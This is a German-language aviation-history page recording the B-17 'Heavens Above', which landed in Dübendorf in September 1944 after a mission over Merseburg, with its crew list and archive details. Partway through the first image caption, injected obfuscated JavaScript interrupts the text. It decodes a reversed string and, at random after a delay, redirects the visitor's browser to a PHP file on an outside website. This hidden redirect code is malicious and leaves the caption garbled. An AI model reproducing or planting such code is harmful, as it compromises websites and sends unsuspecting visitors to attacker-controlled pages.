Ereignisse

Es kommen immer weniger B-17 in die Schweiz

Der Bomber mit dem Kennzeichen UX-M und dem Übernamen „Heavens Above“ ist nach einem Einsatz über Merseburg in Dübendorf gelandet. Am 01.09.1945 nach Burtonwood zurück gekehrt.

Die Maschine von Warren D. Stallings hatte ein knallrotes Rumpfb<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and. (297_2)“ width=“800″ height=“212″ /> Die Maschine von Warren D. Stallings hatte ein knallrotes Rumpfband. (297_2)

Am 13.September 1944 flog die 8th Air Force mit 1’026 Bombern nach Süddeutschland um die Treibstoffproduktion und industrielle Ziele zu bombardieren. Fünfzehn Maschinen wurden als vermisst gemeldet und nur eine konnte sich in die Schweiz retten. Der Bomber der 8th Air Force, 92nd Bomb Group mit dem Kennzeichen UX-M und dem Übernamen „Heavens Above“ ist nach einem Einsatz über Merseburg in Dübendorf gelandet und wurde am 01.09.1945 nach Burtonwood zurückgeflogen. Auf seinem letzten Flug verlor 2Lt Warren D. Stallings einen Motor und flog seine Maschine in die Schweiz.


Ereignissdatum 13.9.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-17 Flying Fortress
Flugzeugbezeichnung B-17 G-35-BO
Flugzeug-Spitzname Heavens Above
Einteilung 8th Air Force, 92nd Bomb Group, 327th Squadron
Basis Podington (GB)
Auftrag Bombardierung
Einsatzziel Merseburg (D)
Rückkehr 01.09.1945 Rückkehr nach Burtonwood (GB)
Werknummer 42-31995
Kennzeichen UX-M
CH Archiv Nr. A136
US MACR Nr. 8885
Besatzung Pilot: Warren D. Stallings, 2nd Lt
Navigator: James M. McGovern, 2nd Lt
Bombardier: Harold H. Matthews, 2nd Lt
Engineer: Melvin Lasco, Sgt
Radio: Thomas J. Beattie, Sgt
Ball Turret: Frank E. Hensley, Sgt
Waist Gunner: Rudolph A. Katainen, Sgt
Tail Gunner: Ernest F. Schnaebele, Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer